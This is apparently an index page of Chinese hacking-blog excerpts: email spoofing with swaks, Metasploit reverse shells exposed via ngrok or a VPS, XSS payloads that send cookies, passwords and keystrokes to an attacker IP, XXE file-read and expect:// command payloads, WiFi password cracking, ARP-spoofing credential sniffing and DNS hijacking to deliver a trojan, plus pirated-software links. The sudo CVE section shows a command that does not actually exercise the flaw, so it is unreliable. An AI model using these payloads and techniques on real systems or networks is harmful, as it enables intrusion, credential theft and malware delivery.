Office 2019 Microsoft Office 2019于今年9月28日正式发布,不过仅支持WIN10系统,我想大家首先想知道的就是2019版增加了哪些新功能亮点,让我们先来一起看一下吧! 亮点1:标签切换动画 Office 2019增加了很多界面特效动画,其中标签动画便是其中最吸引人的一个。每当我们点击一个Ribbon面板时,Office都会自动弹出一个动画特效。整体感觉很像是Win10特有的窗口淡入与淡出。从实际使用情况来看,新增加的过渡特效不仅没有对性能进行拖累,还给人了一种界面切换流畅的感觉,让人耳目一新。 标签切换动画 亮点2:内置IFS等新函数 Excel 2019内置了几款新函数,比如”IFS”多条件判断、”CONCAT”多列合并、“TEXTJOIN“多区域合并等等。以”IFS“举例,条件判断一般我们会选择IF,当条件多于两种时就需要多组IF函数进行嵌套。要是嵌套的层级过多,不仅书写上会有麻烦,后期排错也会相当繁琐。 相比之下,IFS则是将多个条件并列展示,语法结构类似于“IFS(条件1,结果,条件2,结果,条件3,结果,……)”,最多可支持127个不同条件,算得上是给IF函数开挂了! 亮点3:在线插入图标 制作PPT时我们常会使用一些图标,大多数图标结构简单、传达力强,却并不好找。最新版Office 2019则增加了在线图标插入功能,让我们可以像插入图片一样一键插入图标。从试用情况看,Office 2019的在线图标库还是蛮丰富的,分为“人物“、”技术与电子“、”通讯“、“商业”、“分析”、“商贸”、“教育”……等数十组门类。最关键的是,所有的图标都可以借助PowerPoint填色功能直接换色,甚至拆分后分项填色! 安装官网下载 激活工具请点击付费,查看文章隐藏内容。 效果
-
kali下邮件发送工具swaks入坑
Swaks是一个功能强大,灵活,可编写脚本,面向事务的SMTP测试工具, 目前Swaks托管在私有svn存储库中。官方项目页面是http://jetmore.org/john/code/swaks/牛刀小试kali下默认自带,无需安装。 01 测试邮箱的连通性 swaks --to [email protected] 返回250ok,说明该邮箱存在,并且可以正常收信。 利用SMTP发送邮件 swaks --to 收件箱@qq.com --from 发件箱@163.com --body HI这是 由kali发送到您邮件中的内容 --header "Subject: kali论坛 致力于网络安全" --server smtp.163.com -p 25 -au 发件箱@163.com -ap SMTP密码在测试之前,在163官网开启smtp 命令说明: --from [email protected] //发件人邮箱; --ehlo qq.com //伪造邮件ehlo头,即是发件人邮箱的域名。提供身份认证 --body "http://www.baidu.com" //引号中的内容即为邮件正文; --header "Subject:hello" //邮件头信息,subject为邮件标题 --data ./Desktop/email.txt //将正常源邮件的内容保存成TXT文件,再作为正常邮件发送 发送附件 swaks --to 收件箱@qq.com --from 发件箱@163.com --body HI这是 由kali发送到您邮件中的内容 --header "Subject: kali论坛 致力于网络安全" --attach 牛笔阿里云.doc --server smtp.163.com -p 25 -au 发件箱@163.com -ap SMTP密码
-
浅谈两种外网shell的姿势
首先我们来了解下什么是公网什么是内网。所谓外网就是广域网。广域网(英语:Wide Area Network,缩写为 WAN),又称外网、公网。是连接不同地区局域网或城域网计算机通信的远程网。内网就是局域网(Local Area Network,LAN)是指在某一区域内由多台计算机互联成的计算机组。如学校、医院、公安的网络。或者家庭中几台计算机组成的网络。而在实际情况中,外网一般有运营商提供服务,内网有一台路由器即可组建。比如你的手机和电脑在连接同一WiFi时,就处于同一局域网。现在我们来说说两者的区别! 对于公网ip可以所有人访问,如淘宝的服务器。而内网ip只能在同一局域网内的设备访问,如同一WiFi下的手机可以访问电脑。 现在我们思考我们shell的问题? 我们平时在利用msfvenom生成shell的时候,有这样一步 填写kali的ip地址和端口。 LHOST=192.168.232.195 LPORT=5555 这里的ip地址就是我们内网的ip。也就是只有我们内网的设备才能访问到192.168.232.195而外网的设备无法访问。那么我们该如何生成外网的shell呢?姿势一 调戏运营商客户获取公网ip此方法因地域成功率也不高,有的地方是绝对不可能给你的。如xj而东南沿海一般可以试试。通过和客户沟通,说你设备要绑定公网ip,各种调戏各种软磨硬泡或许会给你绑定。如果此方法不同,可以试试下面方法;故意将家中网络搞坏,叫人工报修。师傅会上门处理,这时给师傅一盒中华和师傅拉拉家常,会有意想不到的结果。因为报修师傅地位很低,通常是按处理的工单给提成的。钱赚的少,老婆又嫌弃,地位又很低。给点爱心你可以省下一大笔钱。 姿势二 自建内网映射及端口转发如上诉因地域问题无法解决,我们可以尝试用内网映射的方式来让自己的设备暴露在公网。 利用花生壳做内网映射 优点:简单,速度(免费1M宽带)免费送一个域名、不易掉线 缺点:需要挂客户端(关闭软件,映射也会关闭。) 利用ngrok 优点:免费 可不挂软件(在路由器中配置参数即可) 缺点:速度慢(有钱可以买宽带)、不稳定易掉线。 类似的这样的映射软件比较多,各有优点也有缺点。根据自己的实际情况选择。 kali制作外网shell 配置外网环境我这里用的是http://www.ngrok.cc其他的自行试用 这个可以免费 。远程端口随便填(反正... 购买云服务器(VPS)在前面的教程中说过如何在vps中安装msfconsole请移步文章 渗透测试从PC到VPS 前言在平时我们玩耍的时候,都是在PC机或者在虚拟机上运行的。但是这样有一个缺陷,就是我们在外出的时候或者不方便用P... 优点:速度快,稳定,不需要挂软件,随时随地有ssh连接即可。 缺点: 太贵!没钱!!!
-
渗透测试从PC到VPS
前言在平时我们玩耍的时候,都是在PC机或者在虚拟机上运行的。但是这样有一个缺陷,就是我们在外出的时候或者不方便用PC的时候没有设备让我们玩。同时不少小伙伴在玩msf中很头疼如何玩转外网的shell。除了以前说过的利用端口映射外,在看看如何用vps玩外网shell。 什么是vpsvps(Virtual Private Server 虚拟专用服务器)将一台服务器分割成多个虚拟专享服务器的优质服务。实现VPS的技术分为容器技术,和虚拟化技术 [1] 。在容器或虚拟机中,每个VPS都可分配独立公网IP地址、独立操作系统、实现不同VPS间磁盘空间、内存、CPU资源、进程和系统配置的隔离,为用户和应用程序模拟出“独占”使用计算资源的体验。 说了一大堆,就是一台云服务器 购买vps有钱就行 常见的vps主机商(阿里云 百度云 腾讯云 又拍云 七牛云等等)这里推荐vulter原因很简单…… 环境说明这里笔者购买了一台百度云的vps 系统为centos7 安装nmapyum install nmap当然你也可以参考官方的教程,安装nmap的最新版 测试 nmap -O bbskali.cn 安装sqlmap先安装Python yum install python -y如果已安装,请忽略。 安装sqlmap cd /usr/src git clone https://github.com/sqlmapproject/sqlmap.git]https://github.com/sqlmapproject/sqlmap.git cd sqlmap ./sqlmap.py验证 sqlmap -v 填坑 当我们每次运行sqlmap的时候需要到他的根目录/usr/src,这样比较麻烦,我们可以在做以下配置。 vim /etc/profile 添加下面代码 alias sqlmap='python /usr/src/sqlmap/sqlmap.py'牛刀小试 可以看出,可以成功进行sql注入! 安装msfconsole01先安装依赖 yum groupinstall Development Tools yum install sqlite-devel libxslt-devel libxml2-devel java-1.7.0-openjdk libpcap-devel nano openssl-devel zlib-devel libffi-devel gdbm-devel readline-devel nano wget02 安装yaml和ruby cd /usr/src wget http://pyyaml.org/download/libyaml/yaml-0.1.6.tar.gz]http://pyyaml.org/download/libyaml/yaml-0.1.6.tar.gz tar zxvf yaml-0.1.6.tar.gz cd yaml-0.1.6 ./configure --prefix=/usr/local make && make install cd /usr/src wget http://ftp.ruby-lang.org/pub/ruby/2.2/ruby-2.2.1.tar.gz]http://ftp.ruby-lang.org/pub/ruby/2.2/ruby-2.2.1.tar.gz tar zxvf ruby-2.2.1.tar.gz cd ruby-2.2.1 ./configure --prefix=/usr/local --with-opt-dir=/usr/local/lib make && make install03安装postgresql yum install postgresql(如果安装失败,不影响msfconsole的正常使用) 04安装msfconsole curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb]https://raw.githubusercontent.co ... ppers/msfupdate.erb > msfinstall chmod 755 msfinstall ./msfinstall05 启动 执行msfconsole成功启动 06 测试外网shell 我们生成一个apk(需要注意的是,在生成shell的时候一定要用公网ip这样才能成功!) 如上,手机连接4G网络,安装shell。运行后再msf成功得到反弹。
-
永不消逝的漏洞—XSS
视频不能播放的,用360或者GOOGLE浏览器查看本文! 什么是xssXSS是一种发生在Web前端的漏洞,所以其危害的对象也主要是前端用户。 XSS漏洞可以用来进行钓鱼攻击、前端js挖矿、盗取用户cookie,甚至对主机进行远程控制。 XSS攻击类型危害:存储型 > 反射型 > DOM型 反射型:交互的数据一般不会被存在数据库里面,一次性,所见即所得,一般出现在查询页面等 存储型:交互的数据会被存在数据库里面,永久性存储,一般出现在留言板,注册等页面 DOM型:不与后台服务器产生数据交互,是一种通过DOM操作前端代码输出的时候产生的问题,一次性,也属于反射型 XSS形成原因形成XSS漏洞的主要原因是程序中输入和输出的控制不够严格。导致“精心构造”的脚本输入后,在输出到前端时被浏览器当作有效代码解析执行 反射型XSS(get)我们首先打开Pikachu右键审查元素。 我们看到对文本框的最大长度做出了限制,修改maxlength="20"即可。 payload <script>alert("kali博客")</script> 可以干什么——盗取Cookie修改/pikachu/pkxss/inc/config.inc.php 中的数据库信息访问 http://localhost/pikachu ,访问管理工具里的XSS后台,初始化数据库。 登录到后台界面 修改/var/www/html/pikachu/pkxss/xcookie下的cookie.php,将IP地址改为漏洞服务器的地址 cookie.php用于接收受害者的cookie,然后将页面重定向到漏洞服务器的index页面,我们构造的Payload如下 <script>document.location = 'http://192.168.1.14/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script> 返回到后台 由于是GET类型的XSS漏洞,我们可以直接构造一个带有Payload的URL,诱使受害者点击就能取得Cookie http://192.168.1.14/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.location+%3D+%27http%3A%2F%2F192.168.1.7%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27+%2B+document.cookie%3B%3C%2Fscript%3E&submit=submit反射型XSS(post)我们登录一下,默认账号密码是admin 123456 这时候我们不能直接把我们的恶意代码嵌入到URL中 攻击思路如下 1.我们需要自己搭一个恶意站点,然后在网站上放一个post表单 2.将存放POST表单的链接发送给受害者,诱导受害者点击 3.这个POST表单会自动向漏洞服务器提交一个POST请求,实现受害者帮我们提交POST请求的目的 这个POST表单页面是位于攻击者的Kali机器上 /var/www/html/pikachu/pkxss/xcookie 下名为 post.html 的文件 我们需要修改里面 漏洞服务器 和 攻击者 的服务器地址 post.html页面的作用是:当用户访问这个页面时,会自动向漏洞服务器发送POST请求,然后重定向到漏洞服务器的index页面 http://192.168.1.14/pkxss/xcookie/post.html 我们只需要诱导受害者点击上面的链接就能窃取用户的Cookie 存储型XSS存储型XSS和反射型XSS形成的原因是一样的,不同的是存储型XSS下攻击者的可以将脚本注入到后台存储起来,构成更加持久的危害。我们输入的东西,也直接输出在 p 标签中,看起来没有经过任何转义和处理 下面输入下面的Payload进行测试 <script>alert("xss")</script> 成功弹窗,需要注意的是该弹窗是永久性的,当每个人访问这个页面时,都会弹出该窗口。存储型XSS漏洞利用我们这里用一个Basic认证去做这个钓鱼攻击。我们在一个存在XSS漏洞的页面上面嵌入一个恶意请求,当用户打开这个页面。这个页面就会像攻击者的服务器发送请求,这个请求会返回一个Basic认证的头部。这时候会弹出一个提示框,要求受害者输入账号密码,从而盗取用户的账号密码 首先攻击者需要构造一个钓鱼页面,用来将发送Basic认证的认证框。修改 /var/www/html/pikachu/pkxss/xfish 下的 fish.php 文件,将IP地址改为攻击者的服务器地址。 构造的Payload如下 <script src="http://192.168.1.14/pkxss/xfish/fish.php"></script> 当用户访问这个留言板时,会出现下面的认证框(永久性) 然后在后台 我们就可以看到刚才记录的密码。键盘记录修改 /var/www/html/pikachu/pkxss/rkeypress 下 rk.js 中的IP地址为攻击者地址 rk.js 是攻击代码,我们可以把这个 js 文件放到我们的恶意站点上,然后通过有 XSS 漏洞的页面去调用 这个文件可以记录用户的键盘操作,然后异步发送给攻击者 我们可以用下面的Payload测试一下 <script src="http://192.168.1.14/pkxss/rkeypress/rk.js"></script>当每个人访问留言板时,就会激活上面的代码。从而获取键盘记录。 DOM型XSSDOM可以理解为访问HTML的标准接口,DOM里面会把我们的HTML分成一个DOM树 我们可以以这棵树为入口,通过DOM的某些方法对树进行操作,比如对标签的添加、改变和删除等等 DOM这个东西相当于在前端提供了一个通过JS去对HTML进行操作的接口 构造的Payload如下 #' onclick=alert("xss")> XSS之盲打XSS盲打不是攻击类型,而是一个攻击场景 我们在前台输入 提交后我们输入的内容不会在前对输出,而是提交到了后台,可能管理员会去看。如果我们输入一个JS代码,管理员登录后台管理界面,如果后台把我们的内容输出。那后台管理员可能遭受到我们的XSS攻击,我们提交以下内容 <script>alert("I'm Iron Man")</script> 一旦管理员登录后台,便遭受了XSS攻击。 告辞! 参考文章:https://www.cnblogs.com/dogecheng/p/11556221.html 本文的宗旨在于普及网络安全知识,请读者不要根据此教程做违法行为,造成后果自负,与本站无关。 友情提示!视频由于编码的问题,部分手机浏览器播放不了。请用电脑观看!!!
-
Xee漏洞入门到放弃
XXE 是什么介绍 XXE 之前,我先来说一下普通的 XML 注入,这个的利用面比较狭窄,如果有的话应该也是逻辑漏洞 如图所示: 既然能插入 XML 代码,那我们肯定不能善罢甘休,我们需要更多,于是出现了 XXE XXE(XML External Entity Injection) 全称为 XML 外部实体注入,从名字就能看出来,这是一个注入漏洞,注入的是什么?XML外部实体。(看到这里肯定有人要说:你这不是在废话),固然,其实我这里废话只是想强调我们的利用点是 外部实体 ,也是提醒读者将注意力集中于外部实体中,而不要被 XML 中其他的一些名字相似的东西扰乱了思维(盯好外部实体就行了),如果能注入 外部实体并且成功解析的话,这就会大大拓宽我们 XML 注入的攻击面(这可能就是为什么单独说 而没有说 XML 注入的原因吧,或许普通的 XML 注入真的太鸡肋了,现实中几乎用不到) 相关背景XML是一种非常流行的标记语言,在1990年代后期首次标准化,并被无数的软件项目所采用。它用于配置文件,文档格式(如OOXML,ODF,PDF,RSS,...),图像格式(SVG,EXIF标题)和网络协议(WebDAV,CalDAV,XMLRPC,SOAP,XMPP,SAML, XACML,...),他应用的如此的普遍以至于他出现的任何问题都会带来灾难性的结果。 XML 文档有自己的一个格式规范,这个格式规范是由一个叫做 DTD(document type definition) 的东西控制的,他就是长得下面这个样子 ?xml version="1.0"?>//这一行是 XML 文档定义 <!DOCTYPE message [ <!ELEMENT message (receiver ,sender ,header ,msg)> <!ELEMENT receiver (#PCDATA)> <!ELEMENT sender (#PCDATA)> <!ELEMENT header (#PCDATA)> <!ELEMENT msg (#PCDATA)> 上面这个 DTD 就定义了 XML 的根元素是 message,然后跟元素下面有一些子元素,那么 XML 到时候必须像下面这么写 <message> <receiver>Myself</receiver> <sender>Someone</sender> <header>TheReminder</header> <msg>This is an amazing book</msg> </message>其实除了在 DTD 中定义元素(其实就是对应 XML 中的标签)以外,我们还能在 DTD 中定义实体(对应XML 标签中的内容),毕竟 ML 中除了能标签以外,还需要有些内容是固定的 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe "test" >]>这里 定义元素为 ANY 说明接受任何元素,但是定义了一个 xml 的实体(这是我们在这篇文章中第一次看到实体的真面目,实体其实可以看成一个变量,到时候我们可以在 XML 中通过 & 符号进行引用),那么 XML 就可以写成这样 <creds> <user>&xxe;</user> <pass>mypass</pass> </creds>我们使用 &xxe 对 上面定义的 xxe 实体进行了引用,到时候输出的时候 &xxe 就会被 "test" 替换。 实体分为两种,内部实体和外部实体,上面我们举的例子就是内部实体,但是实体实际上可以从外部的 dtd 文件中引用,我们看下面的代码: <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///c:/test.dtd" >]> <creds> <user>&xxe;</user> <pass>mypass</pass> </creds>这样对引用资源所做的任何更改都会在文档中自动更新,非常方便(方便永远是安全的敌人) 当然,还有一种引用方式是使用 引用公用 DTD 的方法,语法如下: <!DOCTYPE 根元素名称 PUBLIC “DTD标识名” “公用DTD的URI”> 这个在我们的攻击中也可以起到和 SYSTEM 一样的作用 我们上面已经将实体分成了两个派别(内部实体和外部外部),但是实际上从另一个角度看,实体也可以分成两个派别(通用实体和参数实体),别晕。。 1.通用实体 用 &实体名; 引用的实体,他在DTD 中定义,在 XML 文档中引用 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE updateProfile [<!ENTITY file SYSTEM "file:///c:/windows/win.ini"> ]> <updateProfile> <firstname>Joe</firstname> <lastname>&file;</lastname> ... </updateProfile>2.参数实体: (1)使用 % 实体名(这里面空格不能少) 在 DTD 中定义,并且只能在 DTD 中使用 %实体名; 引用 (2)只有在 DTD 文件中,参数实体的声明才能引用其他实体 (3)和通用实体一样,参数实体也可以外部引用 <!ENTITY % an-element "<!ELEMENT mytag (subtag)>"> <!ENTITY % remote-dtd SYSTEM "http://somewhere.example.org/remote.dtd"> %an-element; %remote-dtd;xee漏洞利用验证漏洞<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE a [<!ENTITY xxe "kali博客 blog.bbskali.cn">]> <a>&xxe;</a> 读取系统敏感文件<?xml version = "1.0"?> <!DOCTYPE ANY [ <!ENTITY f SYSTEM "file:///etc/passwd">]> <x>&f;</x> 如图,我们成功读取到了/etc/passwd系统文件下的信息。 在使用file://协议时,有以下几种格式: Linux file:///etc/passwd Windows file:///c:/windows/win.ini file://localhost/c:/windows/win.ini (下面这两种在某些浏览器里是支持的) file:///c|windows/win.ini file://localhost/c|windows/win.ini 除了使用file://协议进行文件读取外,如果XML文档是用PHP进行解析的,那么还可以使用php://filter协议来进行读取。 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE root [ <!ENTITY content SYSTEM "php://filter/resource=c:/windows/win.ini"> ]> <root><foo>&content;</foo></root>远程命令执行 当然了,除了文件读取和DoS外,某些情况下还能进行RCE。例如在PHP开启了PECL上的Expect扩展时,就能使用expect://协议来执行命令。 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE root [<!ENTITY content SYSTEM "expect://dir .">]> <root><foo>&content;</foo></root>
-
Photoshop2020使用体验
安装下载地址: 链接:https://pan.baidu.com/s/1ZeU_rOXgnvPY8PbqbJiuxw 提取码:sn57 默认安装 根据电脑情况等待片刻 点击关闭 需要注意的是,我们直接打开软件会出现闪退的情况。需要到Photoshop的安装目录运行Photoshop_Original绑定我们的账号即可。
-
那些年我们破解WiFi的一些事
写在前面在很早之前,就想写一篇与WiFi相关的文章。奈何工作的事情比较多,又静不下心来写。今天终于耐不住手痒,来写一篇关于WiFi安全的文章。希望通过这篇文章能够引起大家对WiFi安全的重视,需要声明的是,本篇文章包含一定的攻击思路,请且行且珍惜。 分析常用的WiFi破解手段密码破解大法 顾名思义,就是我们准备一个密码字典,然后通过相关软件捕获WiFi的数据包,通过跑包获取密码。WiFi钓鱼 我们可以去尝试搭建一个和目标一样的SSID 在通过洪水攻击,使其不能使用。通过宿主连接钓鱼WiFi从而获取密码。社会工程学 叫声大爷你家WiFi密码是啥来着? 开始正题,来看看拥有一个复杂密码是多么的重要。 基于传统的字典方式破解前期准备:usb无线网卡(芯片为3070或8187如果是5Gwifi 需要8122系列)kali linux(或其他debian系列的) 插入网卡查看网卡状态执行ifconfig或iwconfig查看状态 可以看到,我们的无线网卡已经成功的加载完成。 问题处理: 1,没有wlan0,这是因为网卡没有挂起,执行ifconfig wlan0 up挂起即可!2,执行上诉命令报错, 执行iwconfig查看有没有无线网卡(一般为wlan0 wlan1等等),如果没有证明网线网卡驱动有问题,请安装驱动。如果上诉所讲成功执行,恭喜!你可以接着装逼了。 开启monitor模式执行命令airmon-ng start wlan0 执行完毕后,我们执行ifconfig查看网卡,会变成wlan0mon这样我们的监听模式开启完毕! 扫描周伟的WiFiairodump-ng wlan0mon参数说明: BSSID表示无线AP的MAC地址,PWR表示信号强度,DATA表示无线AP与客户端之间的通信数据,ENC表示加密方式,ESSID表示AP的名称。 我们按ctrl+c停止扫描 捕获数据包airodump-ng -c 6 --bssid 68:3E:34:CC:AB:0D -w test wlan0mon参数说明: -C :所破WiFi的信道 --Bssid :目标的Mac地址 -W:保存的数据包名 执行上诉命令后就开始抓包了,在通常情况下,只有新的设备连接到目标WiFi才能抓到包(比如你刚回家,手机连上WiFi而此时黑客正在抓包)所以这个过程是很漫长的。但是时间不等人,我们可以md3洪水攻击,使其目标主机设备全部掉线,这时掉线的设备会尝试从新连接WiFi,从而获得握手包。 如图,获得握手包后,在右上方会有相关的信息,没有的话证明没有抓到。 此时,我们回到root目录,就会发现我们抓的包。 执行密码破解方式一 利用aircrack-ng破解命令如下: aircrack-ng -w /root/zidian/wordlist.txt /root/test-01.cap注意:wordlist.txt为我们的密码字典 成功破解密码! 方式二 利用ESWA进行破解破解ESWA是windows平台下的一款软件,可以利用CPU和GPU加速破解,效率比aircrack要好。 利用wifite破解在终端执行wifite一键式破解到家(支持wep 密码破解两种)推荐新手使用! 基于wifi钓鱼获取密码利用Fluxion获取WiFi密码 视频演示 相关文章 文章不存在,或文章是加密、私密文章 esp8266 WiFi攻击 登录在浏览器中输入ip地址192.168.4.1视频演示使用教程扫描网络伪造ssid点击ssids添加WiFi名称... 一种新的攻击手段 PMKID Hashcat Attack2018年 hachcat 的作者揭露了一种新的攻击方法,这种方法只需要单个数据包,而且也不需要任何的客户端连接到我们的目标 AP,即使有客户端已连接,也不需要我们向它们发送 deauth 帧,在攻击者和客户端之间没有交互,只存在攻击者和 AP 之间的交互。如果路由器是可被攻击的,那么是几乎可以立刻完成攻击的。当有人正在关联时,有大量的现代路由器会在 AP 自己发送的EAPOL的第一帧后附加一个可选字段,也就是所谓的 PMKID: 01 Install Hxctools & Hashcatgit clone https://github.com/ZerBea/hcxdumptool.git cd hcxdumptool make make install git clone https://github.com/ZerBea/hcxtools.git cd hcxtools make make install02 开启网卡为监听模式airmon-ng start wlan003 获取PMKIDhcxdumptool -i wlan1mon -o galleria.pcapng --enable__status=1 04 转变为Hashcat所支持的模块hcxpcaptool -E essidlist -I identitylist -U usernamelist -z galleriaHC.16800 galleria.pcapng 05 利用Hashcat跑出密码hashcat -m 16800 galleriaHC.16800 -a 0 --kernel-accel=1 -w 4 --force 'topwifipass.txt' 破解WiFi能干什么?如果你仅仅是认为,别人破解了你家的无线WiFi密码是为了蹭网。那么你就大错特错,因为这才是无线渗透的第一步。 获取你的输入密码注:此攻击仅针对http协议的网站,成功率100%。对于https先将其转为http。所以建议大家访问网站时,先看看网站的https是否正常。 :先编辑配置文件vim/etc/ettercap/etter.conf去掉前面的#号 #if you use iptables: #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" 开启ARP欺骗arpspoof -t 目标 网关 -i 设备截取密码ettercap -Tq -i wlan0 如图,我们可以看到目标网址为192.168.123.1用户名为admin密码为admin 获取目标浏览的图片在终端执行ettercap -G启动ettercap的图形界面 点击打开后右上选择Sniff选项里的Unified sniffing(嗅探模式)或者Ctrl+U设置好要嗅探的网卡(一般都是wlan0),开始嗅探。 嗅探局域网内的所有存活主机,选择Hosts下拉选项里的Hosts list选项。 开启中间人监听模式,将要监听的两端分别添加到Target1、Target2,然后选择mitm下拉选项里的arp posoning选项 ,勾选sniff remote connections(嗅探并保持原连接状态)点击确定。 这样别人在浏览网页时,我们即可看到对方浏览的图片。当然当其发朋友圈时,所用的图片也可以截取。 进行dns劫持首先我们先添加一条dns解析 编辑文件 vim /etc/ettercap/etter.dns 这里我们将百度的DNS解析到我们kali的本机ip192.168.123.66 启动Apache(kali默认安装) service apache2 start然后,我们在写一个页面放到var/www/html 不会写,ok这里提供一个! <!doctype html> <html> <head> <meta charset="utf-8"> <title>艾哈!度娘奶!</title> </head> <body> <div style="text-align: center"><img src="img.jpg" width="254" height="220" alt=""/></div> </body> </html> 然后在var/www/html下面放一个img.jpg即可。 在根据上一步,启动ettercap 配置网卡,以及目标。在返回到Plugins选择dns模块 开始攻击,然后当目标访问www.baidu.com效果如下: 这不,不就是个恶搞页面吗?这你就想错了。我们可以利用dns劫持诱导对方下载我们的木马。如下图我们可以利用httrack爬一个关于Flash更新页面。 手机端效果 通过点击下载,即可下载相应的shell。配合msf得到反弹。 附件下载: 下载附件 未完待续……
-
Goaccess从入门到放弃
GoAccess是一个基于终端的快速日志分析器。其核心思想是实时快速分析和查看Web服务器统计信息,而无需使用您的浏览器(如果您希望通过SSH快速分析访问日志,或者只是喜欢在终端中工作),终端输出是默认输出,但它能够生成完整的,独立的实时 HTML报告(非常适合分析,监控和数据可视化),以及a JSON和CSV报告。 首先来看看效果 安装环境centos7 (7.2)goaccess 1.3(1.3版本支持中文) 安装安装依赖yum install ncurses-devel geoip-devel libmaxminddb-devel tokyocabinet-devel openssl-devel 解压安装wget https://tar.goaccess.io/goaccess-1.3.tar.gz tar -xzvf goaccess-1.3.tar.gz cd goaccess-1.3/ ./configure --enable-utf8 --enable-geoip=legacy make make install输入goaccess -V 提示下图,证明安装成功。 牛刀小试生成日志文件 goaccess -f access_log --log-format=COMBINED -a >/root/priess.html
-
phpstudy-linux面板测评
安装安装方法(phpstudy for linux V0.2公测版) 使用 SSH 连接工具 连接到您的 Linux服务器后,根据系统执行相应命令开始安装(大约2分钟完成面板安装): Centos安装脚本 yum install -y wget && wget -O install.sh https://download.xp.cn/install.sh && sh install.sh Ubuntu安装脚本 wget -O install.sh https://download.xp.cn/install.sh && sudo install.sh Deepin安装脚本 wget -O install.sh https://download.xp.cn/install.sh && sudo install.sh Debian安装脚本 wget -O install.sh https://download.xp.cn/install.sh && sudo install.sh 安装成功后如下: 访问登录后台登录界面简而朴实 防火墙报表 还是很漂亮的。 防火墙配置
-
CVE-2019-14287 sudo提权漏洞利用
漏洞详情sudo错误的处理了某些用户id.攻击者可以以根用户身份执行任意命令。使得非root用户不需要知道root密码,就可以执行root才能执行的命令。 系统平台kali-Linux 软件版本1.8.27 漏洞利用首先我们新建一个用户test 然后执行visudo命令添加规则,使得test用户可以执行任意命令 test ALL=(ALL:ALL) ALL 语法 sudo -u root 要执行的命令 示例:我们用直接用账号test查看/etc/shadow提示如下! 这是因为test是非root用户,不能查看有root权限的文件,但是我们执行下面命令: 切换用户su test $ sudo -u root cat /etc/shadow效果如下: 也就是说,在我们不知道root账号密码的情况下,我们执行的root命令。 漏洞修复更新sudo到最新版本1.8.28即可。